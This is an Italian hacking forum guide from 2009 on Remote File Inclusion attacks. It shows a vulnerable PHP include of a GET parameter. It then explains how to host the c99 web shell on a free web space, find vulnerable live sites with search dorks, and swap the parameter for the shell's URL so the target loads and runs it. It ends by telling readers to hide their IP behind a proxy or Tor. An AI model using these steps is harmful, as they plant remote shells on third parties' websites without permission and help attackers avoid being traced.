Guida RFI (Remote File Inclusion).Guida di Duffabio.
Difficoltà: Bassa.Piccola Parte TeoricaUna RFI è una tecnica in cui viene incluso un file (come si capisce dal nome) da remoto.
CODICE
index.com?pag=file.php
$var=$_GET['pag'];
include('$var');
Questo codice in PHP assegna il valore
file.php alla variabile "var".
Come Usare La ShellNoi possiamo usufruire di questo caso usando una Shell (io uso la c99).
Allora per usare la shell c99 (prenderemò in considerazione questa shell) dovete per prima cosa metterla su un vostro spazio web (Altervista) in formato .txt
Trovare I Siti Vulnerabili:Fatto questo basta trovare con l'ausilio di
QUESTE DORK un sito vulnerabile.
I siti vulnerabili dovrebbero essere di questo tipo:
CODICE
http://sitovulnerabile.php?page=story.php
http://sitobucato.com?x=tools.php
Trovato il sito vulnerabile alle RFI bisogna cancellare la parte dopo il segno "=" e inserire il link della nostra shell che andremmo a includere nella pagina vulnerabile.
Esempio:
CODICE
http://sitovulnerabile.com?page=[LINK DELLA TUA SHELL c99]
http://sitobucato.com?x=[LINK DELLA TUA SHELL c99]
Ricordatevi sempre di usare un
Proxy oppure
Tor in modo da coprire il vostro IP.
Edited by Duffabio - 25/8/2009, 11:59Tags: Hacking 
/ 
/ 
